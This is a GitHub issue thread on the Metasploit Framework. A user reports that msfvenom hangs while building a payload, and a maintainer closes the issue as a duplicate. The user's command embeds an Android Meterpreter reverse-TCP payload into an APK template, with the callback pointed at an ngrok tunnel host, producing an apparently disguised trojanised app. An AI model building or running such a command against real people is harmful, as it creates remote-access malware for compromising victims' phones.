### ISSUE TITLE
msfvenom not working ;not able to create payload

### ISSUE THREAD

**Issue by samrudh1312** [rapid7/metasploit-framework#13286]
I run this command : 
```
C:\metasploit>msfvenom  -x 'C:\Users\SAMBHRAMA D YASH\Desktop\piclock.apk' -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=13007 r> -o 'C:\Users\YOGESHWARI DINESH\Desktop\picklock.apk'
C:/metasploit/apps/pro/vendor/bundle/ruby/2.6.0/gems/backports-3.15.0/lib/backports/std_lib.rb:9: warning: Win32API is deprecated after Ruby 1.9.1; use fiddle directly instead
Using APK template: C:\Users\SAMBHRAMA D YASH\Desktop\piclock.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload 
[-] No arch selected, selecting arch: dalvik from the payload
```
 after this nothing comes i even left it overnight

**Comment by gwillcox-r7** [comment]
This seems to be related to #13289. Going to close this issue and track over there instead as the other issue has more details on this bug. @samrudh1312 thanks for reporting this, seems like given multiple people are experiencing this issue there is either something going wrong in `msfvenom` or multiple people are using bad templates (less likely). Have you tried running the command again as #13289 did? May solve your issue; definitely shouldn't be taking more than a few minutes to run.

**Comment by gwillcox-r7** [comment]
Closing and tracking this issue at #13289
